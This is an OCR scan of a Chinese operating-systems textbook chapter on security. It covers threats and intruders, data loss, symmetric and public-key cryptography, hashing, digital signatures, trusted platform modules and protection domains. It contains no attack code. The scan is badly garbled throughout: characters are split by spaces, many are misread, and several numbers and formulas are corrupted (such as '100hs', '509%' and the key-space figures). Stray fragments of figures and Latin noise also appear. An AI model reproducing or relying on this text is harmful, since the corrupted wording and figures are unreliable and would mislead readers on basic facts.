保证 数据 绝对 不 会 及 布 给 未 经 授权 的 人 。 数 据 所 有 者 至 少 应 该 有 能 力 指 
定 谁 可 以 阅读 哪些 信息 ， 而 系统 则 对 用 户 的 选择 进行 强制 执行 ， 这 种 执 
行 的 粒度 应 该 精确 到 文件 。 








|} 



































目标 | 威胁 
| 数据 机 密 性 | 数据 暴露 | 
数据 完整 性 数据 算 改 
| 系统 可 用 位 | 拒绝 服务 | 
“排外 性 系统 被 病毒 控 ill | 











图 9-1 安全 性 的 目标 和 威胁 


第 二 个 目标 数据 完整 性 (data integrity) 是 指 未 经 授权 的 用 户 没有 
得 到 许可 就 擅 目 改动 数据 。 这 里 所 说 的 改动 不 仅 是 指 改变 数据 的 值 ， 而 
且 还 包括 删除 数据 以 及 添加 错误 的 数据 等 情况 。 如 果 系 统 在 数据 所 有 者 
决定 改动 数据 之 前 不 能 保证 其 原封 未 动 ， 那 么 这 样 的 安全 系统 就 坚 无 价 
值 可 言 。 


第 三 个 目标 系统 可 用 性 (system availability) 是 指 没 有 人 可 以 扰乱 
系统 使 之 次 次 。 导 致 系统 拒绝 服务 的 攻击 十 分 普通 。 比 如 ， 如 果 有 一 台 
计算 机 作为 Internet 服 务 上 器， 那么 不 断 地 发 送 请 求 会 使 该 服务 器 次 次 ， 因 
为 单 是 检查 和 丢弃 进来 的 请 求 束 吞 噬 掉 所 有 的 CPU 资源 。 在 这 样 的 情况 





下 ， 寿 系统 处 理 一 个 阅读 网 页 的 请 求 需 要 100hs， 那 么 任何 人 每 秒 及 送 
10 000 个 这 样 的 请 求 融 会 导致 系统 死机 。 许 多 合理 的 系统 模型 和 技术 能 
够 保证 数据 的 机 密 性 和 完整 性 ， 但 是 避免 拒绝 服务 却 相当 困难 。 


最 后 ， 近 年 来 操作 系统 出 现 了 新 的 威胁 ， 计 算 机 合法 用 户 以 外 的 人 
可 以 〈“ 通 过 病毒 和 其 他 手段 ) 获取 一 些 家 用 计算 机 的 控制 权 ， 并 将 这 些 
计算 机 变 成 僵尸 《zombie) ， 入 侵 者 立即 成 为 这 些 计算 机 的 新 主人 。 通 
第 情况 下 ， 这 些 僵尸 用 来 发 送 志 圾 邮件 ， 从 而 使 得 垃圾 邮件 的 真正 来 源 





难以 退 踪 到 。 





从 某 种 意义 上 讲 ， 还 存在 着 为 一 种 威胁 ， 这 种 威胁 与 其 说 是 针对 个 
人 用 户 的 威胁 ， 不 如 说 是 对 社会 的 威胁 。 有 些 人 对 茶 些 国家 或 种 族 不 
满 ， 或 对 世界 感到 屈 您 ， 妻 图 摧毁 尽 可 能 多 的 机 构 ， 而 不 在 意 破 坏 性 和 
受害 者 。 这 些 人 第 第 觉得 攻击 “敌人 ”的 计算 机 是 一 件 令 人 恰 悦 的 事情 ， 
然而 并 不 在 意 “ 攻 击 ” 本 号。 











安全 问题 的 另 一 个 方面 是 隐私 (privacy) : 即 保证 私人 的 信息 不 被 





滥用 。 隐 私 会 导致 许多 法 律 和 道德 问题 。 政 府 是 否 应 该 为 每 个 人 编制 档 
采 来 退 查 罪犯 ? 如 盗 锁 犯 或 逃税 犯 。 和 警察 是 否 可 以 为 了 制止 有 组 织 犯 罪 
而 调查 任何 人 或 任何 事件 ? 当 这 些 特权 与 个 人 权益 发 生 冲突 时 会 怎么 

样 ? 所 有 这 些 话题 绝对 都 是 十 分 重要 的 ， 但 是 它们 却 超 出 了 本 书 的 范 

围 。 


9.1.2 入侵 者 


我 们 中 的 大 多 数 人 非常 善 展 并 且 守 法 ， 那 么 为 什么 要 担心 安全 问题 
Ne? 因为 ， 我 们 周围 的 还 有 少数 人 并 不 友好 ， 他 们 总 是 想 邦 麻烦 《可 能 
为 了 目 己 的 商业 利益 ) 。 从 安全 性 的 角度 来 说 ， 那 些 喜 欢 冯 入 与 目 己 宣 
不 相干 区 域 的 人 叫做 入 侵 者 (intruder) 或 敌人 (adversary) 。 入 侵 者 表 
现 为 两 种 形式 : 被 动 入 侵 者 仅仅 想 阅 读 他 们 无 权 阅 读 的 文件 ， 主 动 入 侵 
者 则 怀 有 和 恶意， 他 们 未 经 授权 就 想 改动 数据 。 当 我 们 设计 操作 系统 抵御 
入 侵 者 时 ， 必 须 牢 记 要 抵御 哪 一 种 入 侵 者 。 通 第 的 入 侵 者 种 类 包括 : 














1. 非 专业 用 户 的 随意 浏览 。 许 多 人 的 工作 人 台 上 都 有 个 人 计算 机 并 连 
接 到 共享 文件 服务 器 上 。 人 类 的 本 性 促使 他 们 中 的 一 些 人 想 要 阅读 他 人 
的 电子 邮件 或 文件 ， 而 这 些 电子 邮件 和 文件 往往 没有 设防 。 例 如 ， 大 多 
数 的 UNIX 系 统 在 默认 情况 下 新 建 的 文件 是 可 以 公开 访问 的 。 


2. 内 部 人 员 的 颖 视 。 学 生 、 系 统 程序 员 、 操 作 员 或 其 他 技术 人 员 经 
常 把 进入 本 地 计算 机 系统 作为 个 人 挑战 之 一 。 他 们 通常 拥有 较 高 技能 ， 
并 且 愿 意 花 费 长 时 间 的 努力 。 





3. 为 获取 利益 而 和 尝试 。 有 些 银行 程序 员 试 图 从 他 们 工作 的 银行 禄 取 
金钱 。 他 们 使 用 的 手段 包括 改变 应 用 软件 使 得 利明 不 被 四 舍 五 入 而 是 下 
接 截断 ， 并 将 截断 下 来 的 不 足 一 分 钱 的 部 分 留 给 自己 ,或 者 调 走 多 年 不 


使 用 的 账户 ， 或 者 发 信 敲 诈 勒索 〈“ 付 钱 给 我 ， 和 否则 我 将 破坏 所 有 的 银 
行 记录 ”) 。 





4. 商 业 或 军事 间 诬 。 间 谍 指 那些 受到 苋 争 对 手 或 外 国 的 资助 并 且 具 
有 很 明确 目的 的 人 ， 他 们 的 目的 在 于 饭 取 计 算 机 程序 、 交 易 数据 、 专 
利 、 技 术 、 公 请 设 计 方案 和 商业 计划 等 。 这 些 非法 企图 通常 使 用 禄 听 手 
段 ， 有 时 甚至 通过 搭建 天 线 来 收集 目标 计算 机 发 出 的 电磁 辐射 。 











我 们 必须 十 分 清楚 防止 敌对 国家 政府 禄 取 和 军事 秘密 与 防止 学 生 在 计 
算 机 系统 内 放 入 笑话 的 不 同 。 安 全 和 防护 上 所 做 的 努力 应 该 取决 于 针对 
哪 一 类 入 侵 者 。 





近年 来 ， 忆 一 类 安全 上 的 隐患 融 是 病毒 ， 我 们 将 在 以 后 的 章节 中 详 
细 讨 论 它 。 简 而 言 之 ， 病 毒 吏 是 一 段 能 够 自我 复制 并 通 冲 会 产生 危害 的 
程序 代码 。 从 茶 种 意义 上 来 次 ， 编 写 病毒 的 人 也 古 入 侵 者 ， 他 们 往往 拥 
有 较 高 的 专业 技能 。 一 般 的 入 侵 者 和 病毒 的 区 别 在 于 ， 前 者 指 想 要 私自 
间 入 系统 并 进行 破坏 的 个 人 ， 后 者 指 被 人 编写 并 释放 传播 企图 引起 危害 
的 程序 。 入 侵 者 设法 进入 特定 的 计算 机 系统 (如 属于 银行 或 五 角 大 楼 的 
某 台 机 器 来 女 取 或 破坏 特定 的 数据 ， 而 病毒 作者 常常 想 造成 破坏 而 不 
在 乎 谁 是 受害 者 。 








9.1.3 ”数据 意外 遗失 








除了 恶意 入 侵 造成 的 威胁 外 ， 有 价值 的 信息 也 会 意外 遗失 。 造 成 数 
据 意 外 遗失 的 原因 通常 包括 : 





LAR: 火灾、 洪水、 地震、 成 争 、 骏 乱 或 老鼠 对 磁带 和 软盘 的 其 
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2. 软 硬件 错误 : CPU 故障 、 磁 盘 或 磁带 不 可 读 、 通 信 故 障 或 程序 里 


的 错误 。 


3. 人 为 过 失 : 不 正确 的 数据 登录 、 错 误 的 磁带 或 磁盘 安装 、 运 行 了 
错误 的 程序 、 人 磁带 或 磁盘 的 遗失 ， 以 及 其 他 的 过 失 等 。 


上 述 大 多 数 情 况 可 以 通过 适当 的 备份 ， 尤 其 是 对 原始 数据 的 远 地 备 
份 来 避免 。 在 防范 数据 不 被 猜 猎 的 入 侵 者 获取 的 同时 ， 防 止 数据 意外 遗 
失 应 得 到 更 广泛 的 重视 。 事 实 上， 数据 意外 遗失 市 来 的 损失 比 入 侵 者 带 
来 的 损失 可 能 更 大 。 











9.2 ”密码 学 原理 





加 密 在 安全 领域 扮演 着 非常 重要 的 角色 。 很 多 人 对 于 报纸 上 的 字谜 
Cnewspaper cryptograms) 都 不 陌生 ， 这 种 加 密 算法 不 过 是 一 个 字谜 游 
戏 ， 其 中 明文 中 的 每 个 字母 被 蔡 换 为 男 一 个 字母 。 这 种 加 密 算法 与 现代 
加 密 算 法 有 着 非常 紧密 的 关联 (就 像 热 狗 与 高 级 祥 饪 术 之 间 的 关系 一 
RE) 。 在 本 节 中 我 们 将 鸟 殉 计算 机 时 代 的 密码 学 ， 其 中 的 某 些 内 容 可 能 
会 对 读者 理解 后 续 章 节 有 所 帮助 ， 任 何 对 安全 这 个 话题 感 兴趣 的 读者 都 
应 该 对 本 章 中 讲述 的 基本 问题 有 所 了 解 。 但 是 ， 对 密码 学 的 详细 阐述 超 
越 了 本 书 的 范围 。 不 过 ， 许 多 优秀 的 书籍 都 详细 讨论 了 这 一 话题 ， 有 兴 
趣 的 读者 可 以 拿 来 参考 (如 Kaufman 等 人 ，2002; Pfleeger, 2006) 。 接 
下 来 ， 我 们 为 不 太 熟 悉 密 码 学 的 读者 做 一 个 快速 简介 。 














加 密 的 目的 是 将 明文 一 一 也 就 是 原始 信息 或 文件 ， 通 过 某 种 手段 变 
为 密 文 ， 通 过 这 种 手段 ， 只 有 经 过 授权 的 人 才 知 道 如 何 将 密 文 恢 复 为 明 
文 。 对 无 关 的 人 来 说 ， 密 文 是 一 段 无 法 理解 的 编码 。 虽 然 这 一 领域 对 初 
学 者 来 说 听 上 去 比较 新 奇 ， 但 是 加 密 和 解密 算法 《函数 ) 往往 是 公开 
的 。 要 想 确 保 加 密 算法 不 被 泄露 是 徒劳 的 ， 否 则 就 会 使 一 些 想 要 保密 数 
据 的 人 对 系统 的 安全 性 产生 错误 理解 。 在 专业 上 ， 这 种 策略 叫做 模糊 安 
全 (security by obscurity) ， 只 有 安全 领域 的 爱好 者 们 才 使 用 该 策 
略 。 奇 怪 的 是 ， 在 这 些 爱好 者 中 也 包括 了 许多 跨国 公司 ， 但 是 他 们 应 该 











是 了 解 更 多 专业 知识 的 。 


在 算法 中 使 用 的 加 密 参 数 叫做 密 钥 key) 。 如 果 P 代 表明 文 ，Ks 
代表 加 密 密 钥 ，C 人 代表 密 文 ，E 代 表 加 密 算 法 〈 即 ， 函 数 ) ， 那 么 
C=E(P,KE )。 这 就 是 加 密 的 定义 。 其 含义 是 把 明文 P 和 加 密 密 钥 Kr 作为 
参数 ， 通 过 加 蜜 算法 E 束 可 以 把 明文 变 为 密 文 。 和 荷兰 密码 学 家 Kerckhoffs 
于 19 世 纪 提 出 了 Kerckhoffs 原 则 。 该 原则 认为 ， 加 密 算法 本 身 应 该 完全 
公开 ， 而 加 密 的 安全 性 由 独立 于 加 密 算法 之 外 的 密 钥 决 定 。 现 在 所 有 严 
说 的 密码 学 家 都 遵循 这 一 原则 。 














同样 地 ， 当 DD 表示 解密 算法 ，Kp 表示 解密 密 钥 时 ，P=D(CKp )。 也 
就 是 说 ， 要 想 把 密 文 还 原 成 明文 ， 可 以 用 密 文 C 和 解密 密 钥 Kp 作为 参 
数 ， 通 过 解密 算法 DD 进行 运算 。 这 两 种 互 逆 运 算 间 的 关系 如 图 9-2 所 示 。 
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明文 输入 一 一 明文 输出 
加 密 算 法 解密 算法 
加 密 解密 


图 9-2 明文 和 窗 文 间 的 关系 


9.2.1 私 钥 加 密 技术 


为 了 描述 得 更 清楚 些 ， 我 们 假设 在 茶 一 个 加 密 算 法 里 每 一 个 字母 都 
由 另 一 个 不 同 的 字母 苦 代 ， 如 所 有 的 A 被 Q 蔡 代 ， 所 有 的 B 被 W 蔡 代 ， 所 
AICHE IN, UL RARE: 


明文 : ABCDEFGHIJKLMNOPQRSTUVWXYZ 
ZL: QWERTYUIOPASDFGHJKLZXCVBNM 


这 种 密 钥 系 统 叫 做 单字 母 蔡 换 ，26 个 字母 与 整个 字母 表 相 匹配 。 在 
这 个 实例 中 的 加 密 密 钥 为 : QWERTYUIOPASDFGHJKLZXCVBNM. 
利用 这 样 的 密 钥 ， 我 们 可 以 把 明文 ATTACK 转 换 为 QZZQEA。 同 时 ， 利 
用 解密 密 钥 可 以 告诉 我 们 如 何 把 密 文 恢复 为 明文 。 在 这 个 实例 中 的 解密 
密 钥 为 : KXVMCNOPHQRSZYUJADLEGWBUFT。 我 们 可 以 看 到 密 文 
中 的 A 是 明文 中 的 K， 密 文中 的 B 是 明文 中 的 XxX， 其 他 字母 依次 类 推 。 








从 表面 上 看 ， 这 是 一 个 安全 的 密 钥 机 制 ， 因 为 密码 破译 者 虽然 知道 
普通 密 钥 机 制 〈 字 母 与 字母 间 的 替换 ) ， 但 他 并 不 知道 26!s4x10” 中 哪 
一 个 是 可 能 的 密 钥 。 但 是 ， 给 定 一 小 段 密 文 ， 这 个 密码 还 是 能 够 被 轻易 
破译 掉 。 破 译 的 基础 在 于 利用 了 自然 语言 的 统计 特性 。 在 英语 中 ， 如 e 
是 最 常用 的 字母 ， 接 下 来 是 :，o，a，n，i 等 。 最 常用 的 双 字 母 组 合 有 


th，in，er，re 等 。 利 用 这 类 人 信息， 破译 该 密码 是 较为 容易 的 。 








许多 类 似 的 密 钥 系统 都 有 这 样 一 个 特点 ， 那 束 是 给 定 了 加 密 密 钥 残 
能 够 较为 容易 地 找到 解密 密 钥 ， 反 之 亦 然 。 这 样 的 系统 采用 了 私 钥 加 密 
技术 或 对 称 密 钥 加 密 技 术 。 虽 然 单 字母 蔡 换 方式 没有 使 用 价值 ， 但 是 如 
打 密 铀 有 足够 的 长 度 ， 对 称 密 钥 机 制 还 是 相对 比较 安全 的 。 对 严格 的 安 
全 系统 来 说 ， 最 少 需要 使 用 256 位 密 钥 ， 因 为 它 的 破译 空间 为 2 
x1.2x10” 。 短 密 钥 只 能 够 抵挡 业余 爱好 者 ， 对 政府 部 门 来 说 却 是 不 安 
全 的 。 








9.2.2” 公 钥 加 密 技 术 





由 于 对 信息 进行 加 密 和 解密 的 运算 量 是 可 控制 的 ， 所 以 私 钥 加 密 体 
系 十 分 有 用 。 但 是 它 也 有 一 个 缺陷 : 发 送 者 与 接受 者 必须 同时 拥有 密 
钥 。 他 们 甚至 必须 有 物理 上 的 接触 ， 才 能 传递 密 钥 。 为 了 解决 这 个 矛 
盾 ， 人 们 引入 了 公 钥 加 密 技 术 (1976 年 由 Diffie 和 Hellman 提 出 )。 这 一 











的 加 密 密 钥 后 不 可 能 推出 对 应 的 解密 密 钥 。 在 这 种 特性 下 ， 加 密 密 钥 可 
被 公开 而 只 有 解密 密 钥 处 于 秘密 状态 。 


为 了 让 大 家 感受 一 下 公 钥 密码 体制 ， 请 看 下 和 面 两 个 问题 : 


问题 1: 314159265358979x314159265358979 等 于 多 少 ? 


问题 2: 3912571506419387090594828508241 的 平方 根 是 多 少 ? 


如 果 给 一 张 纸 和 一 文笔 ,加 上 一 大 杯 冰激凌 作为 正确 答案 的 奖励 ， 
那么 大 多 数 六 年 级 学 生 可 以 在 一 两 个 小 时 内 做 出 问题 1 的 答案 。 而 如 果 
给 一 般 成 年 人 纸 和 笔 ， 并 许 诡 回 答 出 正确 答案 可 以 免 去 终身 509% 税 收 的 
话 ， 大 多 数 人 还 是 不 能 在 没有 计算 器 、 计 算 机 或 其 他 外 界 帮 助 的 条 件 下 
解答 出 问题 2 的 答案。 虽然 平方 和 求 平方 根 互 为 逆 运 算 ， 但 是 它们 在 计 
算 的 复杂 性 上 却 有 很 大 差异 。 这 种 不 对 称 性 构成 了 公 钥 密码 体系 的 基 





础 。 在 公 钥 密码 体系 中 ， 加 密 运 算 比较 简单 ， 而 没有 密 钥 的 解密 运算 却 
TORM. 


一 种 叫做 RSA 的 公 钥 机 制 表明 : 对 计算 机 来 说 ， 大 数 乘法 比 对 大 数 
进行 因 式 分 解 要 容易 得 多 ， 特 别 是 在 使 用 取 模 算法 进行 运算 且 每 个 数字 
都 有 上 百 位 时 (Rivest 等 人 ,1978) 。 这 种 机 制 广泛 应 用 于 密码 领域 。 其 
他 广泛 使 用 的 还 有 离散 对 数 〈El Gamal,1985) 。 公 钥 机 制 的 主要 问题 在 
于 运算 速度 要 比 对 称 密 钥 机 制 慢 数 千 倍 。 


当 我 们 使 用 公 钥 密码 体系 时 ， 每 个 人 都 拥有 一 对 密 钥 〈 公 钥 和 私 
钥 〉 并 把 其 中 的 公 钥 公开 。 公 钥 是 加 密 密 钥 ， 私 钥 是 解密 密 钥 。 通 常 密 
钥 的 运算 是 目 动 进行 的 ， 有 时 候 用 户 可 以 自选 密码 作为 算法 的 种 子 。 在 
发 送 机 密 信息 时 ， 用 接收 方 的 公 钥 将 明文 加 密 。 由 于 只 有 接收 方 拥有 私 
钥 ， 所 以 也 只 有 接收 方 可 以 解密 信息 。 








9.2.3 单 辣 函数 


在 接 下 来 的 许多 场合 里 ， 我 们 将 看 到 有 些 函 数 f{， 其 特性 是 给 定 f 和 
参数 x， 很 容易 计算 出 y=f(x)。 但 是 给 定 f(x)， 要 找到 相应 的 x 却 不 可 行 。 
这 种 函数 采用 了 十 分 复杂 的 方法 把 数字 打 乱 。 有 具体 做 法 可 以 首先 将 y 初 
始 化 为 x。 然 后 可 以 有 一 个 循环 ， 进 行 多 次 欠 代 ， 只 要 在 x 中 有 1 位 就 继 
续 达 代 ， 随 看 每 次 碗 代 ，y 中 的 各 位 的 排列 以 与 过 代 相 关 的 方式 进行 ， 
每 次 迭代 时 添加 不 同 的 常数 ， 最 终生 成 了 彻底 打 乱 位 的 数字 排列 。 这 样 
的 函数 叫做 加 密 散 列 函 数 。 








92.4 数字 签名 





经 常 性 地 使 用 数字 签名 是 很 有 必要 的 。 例 如 ， 假 设 银行 客户 通过 发 
送 电子 邮件 通知 银行 为 其 购买 股票 。 一 小 时 后 ， 定 单 发 出 并 成 交 ， 但 随 
后 股票 大 跌 了 。 现 在 客户 否认 曾经 发 送 过 电子 邮件 。 银 行当 然 可 以 出 示 
电子 邮件 作为 证 据 ， 但 是 客户 也 可 以 声称 是 银行 为 了 获得 佣金 而 伪造 了 
电子 邮件 。 那 么 法 官 如 何 来 找到 真相 呢 ? 








通过 对 邮件 或 其 他 电子 文档 进行 数字 签名 可 以 解决 这 类 问题 ， 并 且 
保证 了 发 送 方 日 后 不 能 抵赖 。 其 中 的 一 个 通常 使 用 的 办 法 是 首先 对 文档 
运行 一 种 单 向 散 列 运算 (hashing) ， 这 种 运算 几乎 是 不 可 逆 的 。 散 列 函 
数 通 常 独立 于 原始 文档 长 度 产生 一 个 固定 长 度 的 结果 值 。 最 常用 的 散 列 
函数 有 MD5 (Message Digest 5) ， 一 种 可 以 产生 16 个 字 节 结果 的 算法 
(Rivest, 1992) 以 及 SHA-1 (Secure Hash Algorithm) ， 一 种 可 以 产生 
20 个 字 节 结果 的 算法 (NIST，1995) 。 比 SHA-1 更 新 版 本 有 SHA-256 和 
SHA-512， 它 们 分 别 产 生 32 字 节 和 64 字 节 的 散 列 结果 ， 但 是 迄今 为 止 ， 
这 两 种 加 密 算法 依然 没有 得 到 广泛 使 用 。 














下 一 步 假 设 我 们 使 用 上 面 讲 过 的 公 钥 密码 。 文 件 所 有 者 利用 他 的 私 
钥 对 散 列 值 进行 运算 得 到 D( 散 列 值 )。 该 值 称 为 签名 块 (signature 
block) ， 它 被 附加 在 文档 之 后 传送 给 接收 方 ， 如 图 9-3 所 示 。 对 散 列 值 





应 用 DD 有 些 像 散 列 解密 ， 但 这 并 不 是 真正 意义 上 的 解密 
没有 被 加 密 。 这 不 过 是 对 散 列 值 进行 的 数学 变换 。 






对 散 列 值 运 
算得 到 DD 


D (HAMEL) 


文档 压缩 后 
得 到 散 列 值 





原始 文档 





a) 


， 因 为 散 列 值 并 


原始 文档 





签名 块 { D ( 散 列 值 ) 


b) 


图 9-3 有) 对 签名 块 进行 运算 ; b) 接 收 方 获取 的 信息 


接收 方 收 到 文档 和 散 列 值 后 ， 首 先 使 用 事先 取得 一 


致 的 MD5 或 SHA 


算法 计算 文档 的 散 列 值 ， 然 后 接收 方 使 用 发 送 方 的 公 钥 对 签名 块 进行 运 
算 以 得 到 E(D(hashb)) 。 这 实际 上 是 对 解密 后 的 散 列 进行 “加 密 ”， 操 作 抵 
消 ， 以 恢复 原 有 的 散 列 。 如 果 计 算 后 的 散 列 值 与 签名 块 中 的 散 列 值 不 一 
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中 被 改动 ) 。 这 种 方法 仅仅 对 一 小 部 分 数据 《〈 散 列 ) 运用 了 〈 慢 速 的 ) 
公 钥 密码 体制 。 请 注意 这 种 方法 仅仅 对 所 有 满足 下 面条 件 的 x 起 作用 : 


E(D(x))=x 


我 们 并 不 能 保证 所 有 的 加 密 函 数 都 拥有 这 种 属性 ， 


要 求 的 就 是 : 


因为 我 们 原来 所 


D(E(x))=x 


在 这 里 ，E 是 加 密 函 数 ，D 是 解密 函数 。 而 为 了 满足 签名 的 要 求 ， 
函数 运算 的 次 序 是 不 受 影响 的 。 也 就 是 说 ，D 和 下 一 定 是 可 交换 的 函 
Blo MRSA IAM A ABE 


要 使 用 这 种 签名 机 制 ， 接 收 方 必 须知 道 发 送 方 的 公 铀 。 有 些 用 户 在 
其 Web 网 页 上 公开 他 们 的 公 钥 ， 但 是 其 他 人 并 没有 这 么 做 ， 因 为 他 们 担 
心 入 侵 者 会 闽 入 并 悄悄 地 改动 其 公 铀 。 对 他 们 来 说 ， 需 要 其 他 方法 来 发 
布 公 铀 。 消 息 发 送 方 的 一 种 常用 方法 是 在 消息 后 附加 数字 证 书 ， 证 书 中 
包含 了 用 户 姓 名 、 公 钥 和 可 信任 的 第 三 方 数字 签名 。 一 旦 用 户 获 得 了 可 
信 的 第 三 方 认证 的 公 钥 ， 那 么 对 于 所 有 使 用 这 种 可 信 第 三 方 确认 来 生成 
目 己 证 书 的 发 送 方 ， 该 用 户 都 可 以 使 用 他 们 的 证 书 。 














认证 机 构 〈Certification Authority, CA) 作为 可 信 的 第 三 方 ， 提 供 
签名 证 书 。 然 而 如 果 用 户 要 验证 有 CA 签名 的 证 书 ， 就 必须 得 到 CA 的 公 
钥 ， 从 哪里 得 到 这 个 公 钥 ? 即使 得 到 了 用 户 又 如 何 确定 这 的 确 是 CA 的 
AWE? 为 了 解决 上 述 两 个 问题 ， 需 要 一 套 完整 的 机 制 来 管理 公 铀 ， 这 
套 机 制 叫做 PKI (Public Key Infrastructure， 公 钥 基 础 设施 ) 。 网 络 浏览 
器 已 经 通过 一 种 特别 的 方式 解决 了 这 个 问题 : 所 有 的 浏览 器 都 预 加 载 了 
大 约 40 个 著名 CA 的 公 钥 。 





上 面 我 们 叙述 了 可 用 于 数字 证 书 的 公 钥 密码 体制 。 同 时 ， 我 们 也 有 


必要 指出 不 包含 公 钥 体制 的 密码 体系 同样 存在 。 


9.2.5 “可 信 平 台 横 块 


加 密 算 法 都 需要 密 钥 (Key) 。 如 果 密 钥 泄 露 了 ， 所 有 基于 该 密 钥 
的 信息 也 等 同 于 泄露 了 ， 可 见 选择 一 种 安全 的 方法 存储 密 钥 是 必要 的 。 
接 下 来 的 问题 是 :如 何在 不 安全 的 系统 中 安全 地 保存 密 钥 呢 ? 











有 一 种 方法 在 工业 上 已 经 被 采用 ， 该 方法 需要 用 到 一 种 叫做 可 信 平 
AER (Trusted Platform Modules, TPM) 的 芯片 。TPM 是 一 种 加 密 处 
理 器 (cryptoprocessor) ， 使 用 内 部 的 非 易 失 性 存储 介质 来 保存 密 钥 。 
该 芯片 用 硬件 实现 数据 的 加 密 / 解 密 操 作 ， 其 效果 与 在 内 存 中 对 明文 块 
进行 加 密 或 对 密 文 块 进行 解密 的 效果 相同 ，TPM 同 时 还 可 以 验证 数字 签 
名 。 由 于 其 所 有 的 操作 都 是 通过 硬件 实现 ， 因 此 速度 比 用 软件 实现 快 许 
多 ， 也 更 可 能 被 广泛 地 应 用 。 一 些 计算 机 已 经 安装 了 TPM 芯 片 ， 预 期 更 
多 的 计算 机 会 在 未 来 安装 。 

















TPM 的 出 现 引发 了 很 多 争议 ， 因 为 不 同 广 商 、 机 构 对 于 谁 来 控制 
TPM 和 和 它 用 来 保护 什么 有 分 歧 。 微 软 大 力 提倡 采用 TPM 忌 片 ， 并 且 为 此 
开发 了 一 系列 应 用 于 TPM 的 技术 ， 包 括 Palladium、NGSCB 以 及 
BitLocker。 微 软 的 观点 是 ， 由 操作 系统 控制 TPM 心 片 ， 并 使 用 该 芯片 阻 
止 非 授权 软件 的 运行 。“ 非 授权 软件 ”可 以 是 盗版 《非法 复制 软件 或 仅 
仅 是 没有 经 过 操作 系统 认证 的 软件 。 如 果 将 TPM 应 用 到 系统 启动 的 过 程 





中 ， 则 计算 机 只 能 启动 经 过 内 置 于 TPM 的 密 钥 签名 的 操作 系统 ， 该 密 铀 
由 ITPM 生 产 商 提 供 ， 该 密 钥 只 会 透露 给 多 许 被 安装 在 该 计算 机 上 的 操作 
系统 的 生产 丙 《〈 如 微软 ) 。 因 此 ， 使 用 TPM 可 以 限制 用 户 对 软件 的 选 
择 ， 用 户 或 许 只 能 选择 经 过 计算 机 生产 商 授 权 的 软件 。 


由 于 TPM 可 以 用 于 防止 音乐 与 电影 的 盗版 ， 这 些 媒体 生产 商 对 该 心 
片 表现 出 了 浓厚 的 兴趣 。TPM 同 样 开局 了 新 的 商业 模式 ， 如 “租借 ?歌曲 
与 电影 。TPM 通 过 检查 日 期 判断 当前 媒体 是 否 已 经 “过 期 ”， 如 果 过 期 ， 
则 拒绝 为 该 媒体 解码 。 





TPM 还 有 非常 广泛 的 应 用 领域 ， 而 这 些 领 域 都 是 我 们 还 未 涉足 的 。 
有 趣 的 是 ，TPM 并 不 能 提高 计算 机 在 应 对 外 部 攻击 中 的 安全 性 。 事 实 
上 ，TPM 关 注 的 重点 是 采用 加 密 技 术 来 阻止 用 户 做 任何 未 经 TPM 控 制 者 
直接 或 间接 授权 的 事情 。 如 果 读 者 想 了 解 更 多 关于 TPM 的 内 容 ， 在 
Wikipedia 中 关于 可 信 计 算 (Trusted Computing) 的 文献 可 能 会 对 你 有 所 
帮助 。 

















9.3 ”保护 机 制 


如 果 有 一 个 清晰 的 模型 来 制定 哪些 事情 是 允许 做 的 ， 以 及 系统 的 哪 
些 资源 需要 保护 ， 那 么 实现 系统 安全 将 会 简单 得 多 。 事 实 上 很 多 安全 方 
面 的 工作 都 是 试图 确定 这 些 问 题 ， 到 现在 为 止 我 们 也 只 是 浅 尝 轰 止 而 
己 。 我 们 将 着 重 论 述 儿 个 有 普 衣 性 的 模型 ， 以 及 增强 它们 的 机 制 。 


9.3.1 你 护 域 


计算 机 系统 里 有 许多 需要 保护 的 “对 象 ?。 这 些 对 象 可 以 是 硬件 (如 
CPU、 内 存 段 、 磁 盘 驱 动 需 或 打印 机 ) 或 软件 (如 进程 、 文 件 、 数 据 库 


或 信号 量 ) 。 


每 一 个 对 象 都 有 用 于 调用 的 单一 名 称 和 人 允许 进程 运行 的 有 限 的 一 系 
列 操作 。read 和 write 是 相对 文件 而 言 的 操作 ; up 和 down 是 相对 信号 量 而 
言 的 操作 。 





显而易见 的 是 ， 我 们 需要 一 种 方法 来 禁止 进程 对 某 些 未 经 授权 的 对 
象 进行 访问 。 而 且 这 样 的 机 制 必须 也 可 以 在 需要 的 时 候 使 得 受到 限制 的 
进程 执行 某 些 合法 的 操作 子 集 。 如 进程 A 可 以 对 文件 F 有 读 的 权限 ,但 
没有 写 的 权限 。 





为 了 讨论 不 同 的 保护 机 制 ， 很 有 必要 介绍 一 下 域 的 概念 。 域 
(domain) 是 一 对 (对 象 ， 权 限 ) 组 合 。 每 一 对 组 合 指定 一 个 对 象 和 一 
些 可 在 其 上 运行 的 操作 子 集 。 这 里 权限 Gight) 是 指 对 某 个 操作 的 执行 
许可 。 通 常 域 相当 于 单个 用 户 ， 告 诉 用 户 可 以 做 什么 不 可 以 做 什么 ， 当 
然 有 时 域 的 范围 比 用 户 要 更 广 。 例 如 ， 一 组 为 某 个 项 目 编写 代码 的 人 员 
可 能 都 属于 相同 的 一 个 域 ， 以 便于 他 们 都 有 权 读 写 与 该 项 目 相关 的 文 
件 。 














对 象 如 何 分 配给 域 由 需求 来 确定 。 一 个 最 基本 的 原则 就 是 最 低 权 限 
JA (Principle of Least Authority, POLA) ， 一 般 而 言 ， 当 每 个 域 都 拥 
有 最 少数 量 的 对 象 和 满足 其 完成 工作 所 需 的 最 低 权 限时 ， 安 全 性 将 达到 
最 好 。 


图 9-4 给 出 了 3 种 域 ， 每 一 个 域 里 都 有 一 些 对 象 ， 每 一 个 对 象 都 有 些 
不 同 的 权限 ( 读 、 写 、 执 行 〉。 请 注意 打印 机 1 同时 存在 于 两 个 域 中 ， 
且 在 每 个 域 中 具有 相同 的 权限 。 文 件 1 同 样 出 现在 两 个 域 中 ， 但 它 在 两 
个 域 中 却 具有 不 同 的 权限 。 





域 ] 域 2 域 3 
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图 9-4 三 个 保护 域 


任何 时 间 ， 每 个 进程 会 在 茶 个 保护 域 中 运行 。 换 句 话说 ， 进 程 可 以 
访问 某 些 对 象 的 集合 ， 每 个 对 象 都 有 一 个 权限 集 。 进 程 运行 时 也 可 以 在 
不 同 的 域 之 间 切 换 。 域 切换 的 规则 很 大 程度 上 与 系统 有 关 。 


为 了 更 详细 地 了 解 域 ， 让 我 们 来 看 看 UNIX 系 统 〈 包 括 Linux、 
FreeBSD 以 及 一 些 相似 的 系统 ) 。 在 UNIX 中 ， 进 程 的 域 是 由 UID 和 GID 
